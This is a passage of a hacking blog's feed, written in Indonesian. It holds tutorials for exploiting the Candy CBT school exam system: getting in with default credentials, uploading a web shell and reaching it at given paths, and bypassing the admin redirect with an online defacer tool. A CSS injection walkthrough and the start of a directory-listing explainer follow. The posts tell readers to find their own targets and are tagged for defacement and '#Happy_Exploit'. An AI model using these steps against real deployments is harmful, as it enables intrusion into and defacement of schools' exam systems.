href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSI3n3b1PFFvfnbJq10yrNbMtqvbWMPpNRQoZjJkAtsNXwijK80lVNYDdOmlCBcLEDrr5CqwWDm-_AkYT-Xy-hSb5y_Zp-VEUzZtqEXHd-LihAtImzSNIt2zB2GOwYSJlsAMbCz6-GoV3D9b35QWBGYwJIwrz3U3oY0RNd5yMdl6ZsyEkbWcmyJlr_Zg/s549/Screenshot%202022-04-30%20092046.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;504&quot; data-original-width=&quot;549&quot; height=&quot;294&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSI3n3b1PFFvfnbJq10yrNbMtqvbWMPpNRQoZjJkAtsNXwijK80lVNYDdOmlCBcLEDrr5CqwWDm-_AkYT-Xy-hSb5y_Zp-VEUzZtqEXHd-LihAtImzSNIt2zB2GOwYSJlsAMbCz6-GoV3D9b35QWBGYwJIwrz3U3oY0RNd5yMdl6ZsyEkbWcmyJlr_Zg/s320/Screenshot%202022-04-30%20092046.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTiO9KVwFVzq_5fH6qeWVQEsROoP0hrAP9AAPakFIdNPr6XLqrR2aCdtofCi7A_okV_scFqUEw2DdKrkz5TOs79OtAHInMNeOKraGONGiuUXHHS20Hx25zt57ihGGvaDt2ghlijyBfE-G684jUgcUexNxs8DtFsY2um-U50REIE0G8kGZMZR7iF1w-HA/s549/Screenshot%202022-04-30%20092406.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;500&quot; data-original-width=&quot;549&quot; height=&quot;291&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTiO9KVwFVzq_5fH6qeWVQEsROoP0hrAP9AAPakFIdNPr6XLqrR2aCdtofCi7A_okV_scFqUEw2DdKrkz5TOs79OtAHInMNeOKraGONGiuUXHHS20Hx25zt57ihGGvaDt2ghlijyBfE-G684jUgcUexNxs8DtFsY2um-U50REIE0G8kGZMZR7iF1w-HA/s320/Screenshot%202022-04-30%20092406.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6PFKRT4RfhtJ6gqDZdnqMQvgeC1zynhMhjuG3nzTi2kVdN4ezTU3P7Y1P9EwBGjBxS8CDtZrm-HuLjrtVVYB-nBsrydY_WD4Hs-jEyBmxioFJMl5YEecGWJ-TqITgcQqEl82VP93eVhQMHdBbwHxS6OWjS3OdE8MYLxxwbVXv00F2iVqtMeSD3Q-7iQ/s553/Screenshot%202022-04-30%20092108.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;501&quot; data-original-width=&quot;553&quot; height=&quot;290&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6PFKRT4RfhtJ6gqDZdnqMQvgeC1zynhMhjuG3nzTi2kVdN4ezTU3P7Y1P9EwBGjBxS8CDtZrm-HuLjrtVVYB-nBsrydY_WD4Hs-jEyBmxioFJMl5YEecGWJ-TqITgcQqEl82VP93eVhQMHdBbwHxS6OWjS3OdE8MYLxxwbVXv00F2iVqtMeSD3Q-7iQ/s320/Screenshot%202022-04-30%20092108.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;dan jika kalian sudah success upload kalian tinggal akses shell nya &quot;&lt;i style=&quot;font-weight: bold;&quot;&gt;https://target.com/temp/ecchi/shell/ecchi.php&lt;/i&gt;&quot; (contoh)&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Exploit Upload Shell 2:&lt;/div&gt;&lt;div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;sebernanya ini dibagian backup/restore data jadi kalian sudah tahu maka langsung ke akses shellnya&lt;/li&gt;&lt;li&gt;untuk akses shellnya &quot;&lt;b&gt;&lt;i&gt;https://target.com/(path admin)/mod_setting/shell.php&lt;/i&gt;&lt;/b&gt;&quot;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;yah segitu aja untuk exploit kali ini hehe....&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;#Happy_Exploit #Candy_CBT_Exploit&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/3860811604544365825/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2022/04/exploit-candy-cbt-284-29x-default.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/3860811604544365825'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/3860811604544365825'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2022/04/exploit-candy-cbt-284-29x-default.html' title='Exploit Candy CBT 2.8.4 &gt; 2.9.x Default User/Password'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSI3n3b1PFFvfnbJq10yrNbMtqvbWMPpNRQoZjJkAtsNXwijK80lVNYDdOmlCBcLEDrr5CqwWDm-_AkYT-Xy-hSb5y_Zp-VEUzZtqEXHd-LihAtImzSNIt2zB2GOwYSJlsAMbCz6-GoV3D9b35QWBGYwJIwrz3U3oY0RNd5yMdl6ZsyEkbWcmyJlr_Zg/s72-c/Screenshot%202022-04-30%20092046.png" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-5296802544214148165</id><published>2021-11-07T14:36:00.001+07:00</published><updated>2021-11-07T14:44:19.170+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><category scheme="http://www.blogger.com/atom/ns#" term="Tools"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>No Redirect in Candy CBT</title><content type='html'>&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgVp87uZsYVxO4QZqd2rm_DWMAUHNYXIFF7NczBjWWbW_ZlI80dN7lBkzI6aVDQI22JY_a-NTbrnz1onHOLKYrLpqGmNYe3Ht0j6SLbit6egEG-ud0j9V1bObuYzbacBZNtMJfGzoVFw7X-UH7WB8I5prumDG9W9Zdl8q93afa6OeI77EVyROrOVs74PQ=s712&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;712&quot; data-original-width=&quot;712&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgVp87uZsYVxO4QZqd2rm_DWMAUHNYXIFF7NczBjWWbW_ZlI80dN7lBkzI6aVDQI22JY_a-NTbrnz1onHOLKYrLpqGmNYe3Ht0j6SLbit6egEG-ud0j9V1bObuYzbacBZNtMJfGzoVFw7X-UH7WB8I5prumDG9W9Zdl8q93afa6OeI77EVyROrOVs74PQ=s320&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hadeh sebenarnya gua udah gak mau lagi berurusan dengan namanya cbt tapi yah gitulah buat kali ini dan terakhir kalinya gua gak akan buat content cbt lagi dan ini adalah yang terakhir.&lt;p&gt;&lt;/p&gt;&lt;p&gt;ok kali ini gua akan share gimana bug no redirect di candy cbt (nih cbt dari dulu banyak bug mulu dah gak ada habis2 nya) oh iya bug ini udah gua temu tahun lalu dan sekarang gua akan share aja dah ke kalian.&lt;br /&gt;&lt;br /&gt;Dork&lt;span&gt;&amp;nbsp; &amp;nbsp; : - (kalian buat sendiri ini bug bisa di semua versi soalnya)&lt;br /&gt;Tool&lt;span&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;: - (cari aja di google banyak tapi lebih bagus sih pake firefox ekstensinya)&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Kalo sudah semuanya di siapin kita langsung ke tutorialnya...&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;1. Siapkan target kalian&lt;/p&gt;&lt;p&gt;2. Karna disini gua gak install firefox jadinya gua pake tool online aja dari&amp;nbsp;&lt;a href=&quot;https://tools.zone-xsec.com/defacer/noredirect&quot;&gt;Zone Xsec&lt;/a&gt;&amp;nbsp;nah kalo gua pake tool online gua tinggal submit dan boom&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimCiDnVj3d26Gx5EXdPXldPh6_40sjOtFQ0fZZUWFk0lp5qGCmdOSWKtcyrzcMO8f8f8m162a37Ank4IUkuHCwMrYK61sUZ5wdJXpF8RW7tCTHn8r9or1p4eiMSrWtnqL2SAYDY0Au6Jd0/&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;768&quot; data-original-width=&quot;1366&quot; height=&quot;180&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimCiDnVj3d26Gx5EXdPXldPh6_40sjOtFQ0fZZUWFk0lp5qGCmdOSWKtcyrzcMO8f8f8m162a37Ank4IUkuHCwMrYK61sUZ5wdJXpF8RW7tCTHn8r9or1p4eiMSrWtnqL2SAYDY0Au6Jd0/&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Tapi dashboardnya kok gitu yah?? menu2 nya kemana?? nah kalo itu coba kalian ngepentest lewat firefox ada tutorial nya dan banyak&lt;br /&gt;&lt;br /&gt;Sekian dan Selesai...&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;sebenernya ada 1 bug lagi yaitu sqli tapi gua males ngetiknya jadi ini aja dan ini adalah content terakhir tentang CBT&lt;/p&gt;&lt;p&gt;#Happy_exploiting&amp;nbsp;&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/5296802544214148165/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2021/11/no-redirect-in-candy-cbt.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/5296802544214148165'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/5296802544214148165'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2021/11/no-redirect-in-candy-cbt.html' title='No Redirect in Candy CBT'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/a/AVvXsEgVp87uZsYVxO4QZqd2rm_DWMAUHNYXIFF7NczBjWWbW_ZlI80dN7lBkzI6aVDQI22JY_a-NTbrnz1onHOLKYrLpqGmNYe3Ht0j6SLbit6egEG-ud0j9V1bObuYzbacBZNtMJfGzoVFw7X-UH7WB8I5prumDG9W9Zdl8q93afa6OeI77EVyROrOVs74PQ=s72-c" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-2075442445171331038</id><published>2021-10-18T08:42:00.000+07:00</published><updated>2021-10-18T08:42:01.423+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Injection"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>CSS Injection</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgTOxd5YW8FJKVc3vmhDVCjTx_X01QXqwTYvdAFKlLXGI5NoeppJvtFnBE9dIOThNsezJOm-_Cv8Srb7s6D-gtwjtWnjWwWwOM10SXvcEqmX8MAwbuA-W5lgpCToL7mx5Gb20VnAF1nHFoaTNV4QNoO5FaX0GvmXIUb_GKhUxO6OxpNDY-tzx-X0aqlbA=s2039&quot; style=&quot;margin-left: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1631&quot; data-original-width=&quot;2039&quot; height=&quot;256&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgTOxd5YW8FJKVc3vmhDVCjTx_X01QXqwTYvdAFKlLXGI5NoeppJvtFnBE9dIOThNsezJOm-_Cv8Srb7s6D-gtwjtWnjWwWwOM10SXvcEqmX8MAwbuA-W5lgpCToL7mx5Gb20VnAF1nHFoaTNV4QNoO5FaX0GvmXIUb_GKhUxO6OxpNDY-tzx-X0aqlbA=s320&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;Yo gan dah lama gak jumpa lagi kali ini gua cuman mau share doang sebenernya nih method dah lama cuman lagi keinget aja hehe...&amp;nbsp;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;jadi ane share aja sapa tahu belum ada tahu tentang metode ini....&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;b&gt;&lt;i&gt;Pernah kepikiran gak oleh kalian bahwa sebuah CSS bisa di injeksi??&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;Nah di content kali ini gua akan share gimana cara sebuah CSS bisa di injeksi&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;Disini gua dah buat sebuah source code nya bisa kalian salin di bawah&lt;/span&gt;&lt;/p&gt;&lt;iframe src=&quot;https://pastebin.com/embed_iframe/gX7K9UKc&quot; style=&quot;border: none; width: 100%;&quot;&gt;&lt;/iframe&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;Jika sudah kalian salin coba jalankan di localhost kalian.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;Selanjutnya kalian input sebuah code color hex, contoh : #abc, #000, dll.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;Jika sudah kalian input, klick submit maka backgroundnya akan berubah&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhGKyZk-zRjpzEPsDyADDlboBakiDSpwHOUZjeXInaY_jHEnOgCjiIAn83HEhONDe0ebYg0-RTVdaWm8di4fhsWop38nT46yfHH4xb5USfOSa-AsujXWHhV_J6w6bRMLVY7mIalg7kKhoemxWJp4mKBfb0D-DfitWMZtoVp1cKBDnh4eUuhHMPoQHS7Qw=s1366&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;768&quot; data-original-width=&quot;1366&quot; height=&quot;180&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhGKyZk-zRjpzEPsDyADDlboBakiDSpwHOUZjeXInaY_jHEnOgCjiIAn83HEhONDe0ebYg0-RTVdaWm8di4fhsWop38nT46yfHH4xb5USfOSa-AsujXWHhV_J6w6bRMLVY7mIalg7kKhoemxWJp4mKBfb0D-DfitWMZtoVp1cKBDnh4eUuhHMPoQHS7Qw=s320&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;Perhatikan di line code 37 disana ada fungsi sebuah append (sebenernya bisa sih pake fungsi css()) dan di line 30 ada fungsi klick dan keyup disinilah penyebab css bisa di injeksi dengan payload atau query css yang berbahaya dengan menginput code css maka si server akan mengeksekusinya&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhB97P4I1uoSlImCAIdHqamd_lfZbCoEdycX3WkIpBOiixj1dspLHvF35oua_TOKsuPJZE6i1oWyI3GD9v8hErMVi_5XivnC0vANyNs9qOP0Llv7UwQdBF-cn_KH_3HIeMdVFs1dt4kT6TNujqDwLg25vArtfzBbtZo-e5YNCiGEeEPI8odMCNsJuCKTQ=s462&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;394&quot; data-original-width=&quot;462&quot; height=&quot;273&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhB97P4I1uoSlImCAIdHqamd_lfZbCoEdycX3WkIpBOiixj1dspLHvF35oua_TOKsuPJZE6i1oWyI3GD9v8hErMVi_5XivnC0vANyNs9qOP0Llv7UwQdBF-cn_KH_3HIeMdVFs1dt4kT6TNujqDwLg25vArtfzBbtZo-e5YNCiGEeEPI8odMCNsJuCKTQ=s320&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhKbgXWoXwxu3nFlK6QNrk-5duWuSWp2ZKi40RfOf4IwZGubVgPb-S6yrUqbicx3V2zNcZb7MHFnqjTKBRZL0qPhEG8hKNwFnCxldNIA4dxcQUKzhgEr1ABZx_z3s2dG_GP6AxdVy7KmHnP1DaV4GRaNcBBBrS6BfZG04WD7K1Qp_JgqB34c_bjWrrxcg=s1366&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;768&quot; data-original-width=&quot;1366&quot; height=&quot;180&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhKbgXWoXwxu3nFlK6QNrk-5duWuSWp2ZKi40RfOf4IwZGubVgPb-S6yrUqbicx3V2zNcZb7MHFnqjTKBRZL0qPhEG8hKNwFnCxldNIA4dxcQUKzhgEr1ABZx_z3s2dG_GP6AxdVy7KmHnP1DaV4GRaNcBBBrS6BfZG04WD7K1Qp_JgqB34c_bjWrrxcg=s320&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;code yang di input akan di eksekusi&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;yap segitu aja dah ane cuman lagi kepikiran aja tentang ini wkwk biasanya seperti ini akan ada di CTF kalo orang yang suka main CTF pasti tahu tentang ini soalnya atau terkadang ada soal atau CTF yang berbentuk soalnya seperti ini dan ini sama seperti HTML Injection hanya saja payload yang kita input berbentuk CSS&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;i&gt;Refrensi :&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;a href=&quot;https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/05-Testing_for_CSS_Injection&quot;&gt;&lt;i&gt;https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/05-Testing_for_CSS_Injection&lt;/i&gt;&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;a href=&quot;https://github.com/tarantula-team/CSS-injection-in-Swagger-UI&quot;&gt;&lt;i&gt;https://github.com/tarantula-team/CSS-injection-in-Swagger-UI&lt;/i&gt;&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://www.netsparker.com/blog/web-security/private-data-stolen-exploiting-css-injection/&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;https://www.netsparker.com/blog/web-security/private-data-stolen-exploiting-css-injection/&lt;/span&gt;&lt;/i&gt;&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/2075442445171331038/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2021/10/css-injection.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/2075442445171331038'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/2075442445171331038'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2021/10/css-injection.html' title='CSS Injection'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/a/AVvXsEgTOxd5YW8FJKVc3vmhDVCjTx_X01QXqwTYvdAFKlLXGI5NoeppJvtFnBE9dIOThNsezJOm-_Cv8Srb7s6D-gtwjtWnjWwWwOM10SXvcEqmX8MAwbuA-W5lgpCToL7mx5Gb20VnAF1nHFoaTNV4QNoO5FaX0GvmXIUb_GKhUxO6OxpNDY-tzx-X0aqlbA=s72-c" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-2789055377130280232</id><published>2021-04-24T06:55:00.003+07:00</published><updated>2021-04-24T07:01:48.793+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="IT"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>Apa Itu DirList (Directory Listing) ?</title><content type='html'>&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3mwQNe_QqZrFaYA-2nGytUPJgGxYoL520zEyL2WBvx4pESe7D-txmFgOr5u3DJjpk1XKeoJ230e4DvwxzghnRtAVfMb5fK1a078U8BjPZtRpOJYWgvEL78F2JwKOCCpTUAmxlG1uzeQaW/s740/mantap.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;440&quot; data-original-width=&quot;740&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3mwQNe_QqZrFaYA-2nGytUPJgGxYoL520zEyL2WBvx4pESe7D-txmFgOr5u3DJjpk1XKeoJ230e4DvwxzghnRtAVfMb5fK1a078U8BjPZtRpOJYWgvEL78F2JwKOCCpTUAmxlG1uzeQaW/s320/mantap.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;b&gt;Directory Listing &lt;/b&gt;atau disebut juga &lt;i style=&quot;font-weight: bold;&quot;&gt;DirList&lt;/i&gt;&amp;nbsp;adalah sebuah fungsi server dari web yang menampilkan isi atau daftar semua file yang saat di akses tidak adanya indexs dalam directory tersebut.&lt;div&gt;&lt;br /&gt;&lt;div&gt;Contohnya ketika seseorang mengakses web https://ecchiexploit.blogspot.com/assets tanpa menentukan nama file atau dir, server web akan memproses akses tersebut dan yang pertama kali yang akan di proses adalah indexs dari directory tersebut, jika indexs tidak ada maka yang dihasilkan adalah menampilkan isi seluruh dari directory tersebut.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFurvBEVGKhXodgiUV9eOSPHK3CTVsB00dU8mVLRAl0Fw2efxTZjwENCVJkGrboIJfkqLts0TEt3KtEumLkJ8hhPTDbxIujPvlCZDw01HkD-2WOgN4bpLW0wy8oPTOexi2wEqMOYOGRD4N/s1359/test1.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;731&quot; data-original-width=&quot;1359&quot; 